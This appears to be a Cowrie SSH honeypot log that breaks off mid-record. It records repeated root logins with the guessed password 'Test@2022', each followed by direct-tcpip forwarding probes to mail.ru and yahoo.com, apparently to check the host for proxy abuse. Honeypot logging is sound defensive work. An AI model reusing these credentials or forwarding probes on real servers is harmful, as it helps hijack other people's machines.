{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11423,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf578ef082c7","protocol":"ssh","message":"New connection: 77.83.207.83:11423 (1.2.3.4:22) [session: cf578ef082c7]","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.178079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.179091Z","src_ip":"77.83.207.83","session":"cf578ef082c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.228766Z","src_ip":"77.83.207.83","session":"cf578ef082c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.476398Z","src_ip":"77.83.207.83","session":"cf578ef082c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14157,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:14157","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.527223Z","session":"cf578ef082c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.576944Z","src_ip":"77.83.207.83","session":"cf578ef082c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":568,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:568","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.720136Z","session":"cf578ef082c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.770003Z","src_ip":"77.83.207.83","session":"cf578ef082c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":25169,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:25169","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.911964Z","session":"cf578ef082c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:47.961730Z","src_ip":"77.83.207.83","session":"cf578ef082c7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.012595Z","src_ip":"77.83.207.83","session":"cf578ef082c7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11487,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ce990dc9eab","protocol":"ssh","message":"New connection: 77.83.207.83:11487 (1.2.3.4:22) [session: 2ce990dc9eab]","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.061381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.062235Z","src_ip":"77.83.207.83","session":"2ce990dc9eab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.112103Z","src_ip":"77.83.207.83","session":"2ce990dc9eab"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.336337Z","src_ip":"212.227.235.229","session":"e85542b54f8c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.337250Z","src_ip":"212.227.235.229","session":"e85542b54f8c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.360414Z","src_ip":"77.83.207.83","session":"2ce990dc9eab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3120,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:3120","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.411909Z","session":"2ce990dc9eab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.461830Z","src_ip":"77.83.207.83","session":"2ce990dc9eab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":5808,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:5808","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.604165Z","session":"2ce990dc9eab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.653920Z","src_ip":"77.83.207.83","session":"2ce990dc9eab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":6285,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6285","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.796157Z","session":"2ce990dc9eab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.846039Z","src_ip":"77.83.207.83","session":"2ce990dc9eab"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.896807Z","src_ip":"77.83.207.83","session":"2ce990dc9eab"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11572,"dst_ip":"1.2.3.4","dst_port":22,"session":"15516d8f783e","protocol":"ssh","message":"New connection: 77.83.207.83:11572 (1.2.3.4:22) [session: 15516d8f783e]","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.947613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:48.948901Z","src_ip":"77.83.207.83","session":"15516d8f783e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.000012Z","src_ip":"77.83.207.83","session":"15516d8f783e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.255615Z","src_ip":"77.83.207.83","session":"15516d8f783e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4120,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4120","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.307976Z","session":"15516d8f783e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.359185Z","src_ip":"77.83.207.83","session":"15516d8f783e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":19846,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:19846","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.501582Z","session":"15516d8f783e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.552853Z","src_ip":"77.83.207.83","session":"15516d8f783e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":7319,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:7319","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.697488Z","session":"15516d8f783e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.748610Z","src_ip":"77.83.207.83","session":"15516d8f783e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.800351Z","src_ip":"77.83.207.83","session":"15516d8f783e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11675,"dst_ip":"1.2.3.4","dst_port":22,"session":"7110efc5ea48","protocol":"ssh","message":"New connection: 77.83.207.83:11675 (1.2.3.4:22) [session: 7110efc5ea48]","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.848516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.858593Z","src_ip":"77.83.207.83","session":"7110efc5ea48"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:49.898475Z","src_ip":"77.83.207.83","session":"7110efc5ea48"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.146114Z","src_ip":"77.83.207.83","session":"7110efc5ea48"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4276,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:4276","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.196907Z","session":"7110efc5ea48"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.246580Z","src_ip":"77.83.207.83","session":"7110efc5ea48"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11950,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11950","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.387885Z","session":"7110efc5ea48"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.437893Z","src_ip":"77.83.207.83","session":"7110efc5ea48"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":18886,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18886","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.579896Z","session":"7110efc5ea48"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.629327Z","src_ip":"77.83.207.83","session":"7110efc5ea48"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.679393Z","src_ip":"77.83.207.83","session":"7110efc5ea48"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11775,"dst_ip":"1.2.3.4","dst_port":22,"session":"565c05a8cfc2","protocol":"ssh","message":"New connection: 77.83.207.83:11775 (1.2.3.4:22) [session: 565c05a8cfc2]","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.727965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.728644Z","src_ip":"77.83.207.83","session":"565c05a8cfc2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"]